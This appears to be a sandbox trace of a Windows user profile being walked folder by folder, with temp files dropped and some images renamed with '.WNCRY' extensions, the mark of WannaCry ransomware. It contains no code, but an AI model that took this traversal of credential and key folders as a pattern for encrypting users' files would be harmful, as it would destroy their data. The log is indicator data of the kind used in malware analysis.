C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security\~SD263E.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\~SD263F.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si\~SD2640.tmp
C:\Users\user\AppData\Roaming\*
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\~SD2641.tmp
C:\Users\user\AppData\Roaming\Adobe\*
C:\Users\user\AppData\Roaming\Adobe
C:\Users\user\AppData\Roaming\Adobe\~SD2652.tmp
C:\Users\user\AppData\Roaming\Adobe\Acrobat\*
C:\Users\user\AppData\Roaming\Adobe\Acrobat
C:\Users\user\AppData\Roaming\Adobe\Acrobat\~SD2653.tmp
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\*
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\~SD2654.tmp
C:\Users\user\AppData\Roaming\Adobe\Flash Player\*
C:\Users\user\AppData\Roaming\Adobe\Flash Player
C:\Users\user\AppData\Roaming\Adobe\Flash Player\~SD2655.tmp
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\*
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\~SD2656.tmp
C:\Users\user\AppData\Roaming\Adobe\Headlights\*
C:\Users\user\AppData\Roaming\Adobe\Headlights
C:\Users\user\AppData\Roaming\Adobe\Headlights\~SD2657.tmp
C:\Users\user\AppData\Roaming\Adobe\Linguistics\*
C:\Users\user\AppData\Roaming\Adobe\Linguistics
C:\Users\user\AppData\Roaming\Adobe\Linguistics\~SD2658.tmp
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\*
C:\Users\user\AppData\Roaming\Adobe\LogTransport2
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\~SD2678.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\*
C:\Users\user\AppData\Roaming\com.adobe.dunamis
C:\Users\user\AppData\Roaming\com.adobe.dunamis\~SD2698.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\*
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\~SD26E8.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\*
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\~SD2746.tmp
C:\Users\user\AppData\Roaming\Identities\*
C:\Users\user\AppData\Roaming\Identities
C:\Users\user\AppData\Roaming\Identities\~SD27A5.tmp
C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\*
C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}
C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\~SD2804.tmp
C:\Users\user\AppData\Roaming\Media Center Programs\*
C:\Users\user\AppData\Roaming\Media Center Programs
C:\Users\user\AppData\Roaming\Media Center Programs\~SD2834.tmp
C:\Users\user\AppData\Roaming\Microsoft\*
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\~SD2844.tmp
C:\Users\user\AppData\Roaming\Microsoft\AddIns\*
C:\Users\user\AppData\Roaming\Microsoft\AddIns
C:\Users\user\AppData\Roaming\Microsoft\AddIns\~SD2855.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\*
C:\Users\user\AppData\Roaming\Microsoft\Bibliography
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\~SD2866.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\*
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\~SD2876.tmp
C:\Users\user\AppData\Roaming\Microsoft\Credentials\*
C:\Users\user\AppData\Roaming\Microsoft\Credentials
C:\Users\user\AppData\Roaming\Microsoft\Credentials\~SD2887.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\*
C:\Users\user\AppData\Roaming\Microsoft\Crypto
C:\Users\user\AppData\Roaming\Microsoft\Crypto\~SD28A7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\*
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\~SD28C7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\*
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD28E8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\*
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\~SD2908.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\*
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\~SD2909.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\*
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\~SD2929.tmp
C:\Users\user\AppData\Roaming\Microsoft\Excel\*
C:\Users\user\AppData\Roaming\Microsoft\Excel
C:\Users\user\AppData\Roaming\Microsoft\Excel\~SD2949.tmp
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\*
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\~SD2979.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\~SD29A9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SD29BA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\~SD29EA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\~SD29FA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\~SD2A2A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\~SD2A5A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\*
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\~SD2A7A.tmp
C:\Users\user\AppData\Roaming\Microsoft\MMC\*
C:\Users\user\AppData\Roaming\Microsoft\MMC
C:\Users\user\AppData\Roaming\Microsoft\MMC\~SD2AAA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\*
C:\Users\user\AppData\Roaming\Microsoft\Office
C:\Users\user\AppData\Roaming\Microsoft\Office\~SD2ADA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\*
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\~SD2B0A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Proof\*
C:\Users\user\AppData\Roaming\Microsoft\Proof
C:\Users\user\AppData\Roaming\Microsoft\Proof\~SD2B3A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Protect\*
C:\Users\user\AppData\Roaming\Microsoft\Protect
C:\Users\user\AppData\Roaming\Microsoft\Protect\~SD2B79.tmp
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\*
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD2BC8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Speech\*
C:\Users\user\AppData\Roaming\Microsoft\Speech
C:\Users\user\AppData\Roaming\Microsoft\Speech\~SD2C08.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\~SD2C38.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\~SD2C68.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\~SD2C88.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\~SD2CD7.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\~SD2CE8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\*
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Users\user\AppData\Roaming\Microsoft\Templates\~SD2D17.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\~SD2D47.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\~SD2D96.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\~SD2DA7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\~SD2DD7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\~SD2E93.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\~SD2EA4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\~SD2EC4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\~SD2EE5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\~SD2EF5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\~SD2EF6.tmp
C:\Users\user\AppData\Roaming\Microsoft\UProof\*
C:\Users\user\AppData\Roaming\Microsoft\UProof
C:\Users\user\AppData\Roaming\Microsoft\UProof\~SD2EF7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Vault\*
C:\Users\user\AppData\Roaming\Microsoft\Vault
C:\Users\user\AppData\Roaming\Microsoft\Vault\~SD2EF8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\*
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\~SD2EF9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\~SD2F0C.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\~SD2F0D.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\~SD2F0E.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\~SD2F0F.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\~SD2F10.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\~SD2F20.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory
C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\~SD2F21.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\~SD2F22.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SD2F52.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SD2F63.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\~SD2F83.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\~SD2F94.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\~SD2FA4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\~SD2FB5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\~SD2FF5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\~SD3044.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\~SD3093.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD30C3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3102.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3132.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3162.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3182.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD31A2.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\~SD31D3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\~SD3203.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\~SD3233.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\*
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\~SD32C1.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Word\*
C:\Users\user\AppData\Roaming\Microsoft\Word
C:\Users\user\AppData\Roaming\Microsoft\Word\~SD331F.tmp
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\*
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\~SD3330.tmp
C:\Users\user\AppData\Roaming\Mozilla\*
C:\Users\user\AppData\Roaming\Mozilla
C:\Users\user\AppData\Roaming\Mozilla\~SD337F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Extensions\*
C:\Users\user\AppData\Roaming\Mozilla\Extensions
C:\Users\user\AppData\Roaming\Mozilla\Extensions\~SD33AF.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox
C:\Users\user\AppData\Roaming\Mozilla\Firefox\~SD33DF.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\~SD340F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\~SD341F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\~SD3420.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\~SD3431.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD3432.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\~SD3443.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\~SD3444.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\~SD3445.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\~SD3446.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\~SD3447.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\~SD3457.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\~SD3458.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\~SD3459.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\~SD345A.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\~SD345B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\~SD347C.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\~SD348C.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\~SD348D.tmp
